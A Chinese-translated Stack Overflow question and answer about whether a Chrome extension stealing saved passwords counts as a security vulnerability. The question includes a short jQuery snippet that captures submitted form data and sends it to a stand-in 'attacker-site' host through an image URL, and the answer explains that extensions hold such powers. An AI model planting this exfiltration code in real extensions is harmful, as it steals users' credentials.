我在我的本地环境中进行了这样的测试。
- 假设我在 X 站点上保存了用户名和密码。
- 制作一个具有这样背景的 Chrome 扩展程序
在 background.js 中:
$(document).on('submit','form',function(){
$("img.logo").attr("src","https://attacker-site/logo.png?data=" + $(this).serialize());
});
用户打开X站点后,使用保存的密码登录。使用设置新图像的来源可以绕过 CORS,我将获得所有提交的表单数据,包括保存的密码。
那么,这是一个安全漏洞还是不是 - 因为很难向普通用户提供此 Chrome 扩展程序? (例如:Chrome 商店会在发布之前非常仔细地验证新扩展..)
最佳答案
一些扩展功能 super 强大,可以在页面上运行任意 JavaScript。扩展程序在用户安装时请求此权限。
原则上 - 扩展程序可以窃取您的所有浏览信息、打开和查询任意页面以及在您提交表单时读取密码。
他们还可以与您在 Facebook 上的所有 friend 解除好友关系,将马的照片通过电子邮件发送给您的大家庭,并向您的老板发送眨眼的笑脸。
Chrome 商店不能很好地验证扩展 - 实际上,像“图像调整器”这样的扩展可以愉快地挖掘加密货币或将信息发送到他们的服务器(情况已经如此),甚至还有购买运行能力的业务使用扩展程序在用户计算机上编写代码。
我认为 Chrome 的政策是基于以下假设:用户是成年人并且可以选择他们想要安装的扩展程序。好吧。
关于javascript - 通过 Chrome 扩展程序窃取用户保存的密码是否属于安全漏洞?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/49726469/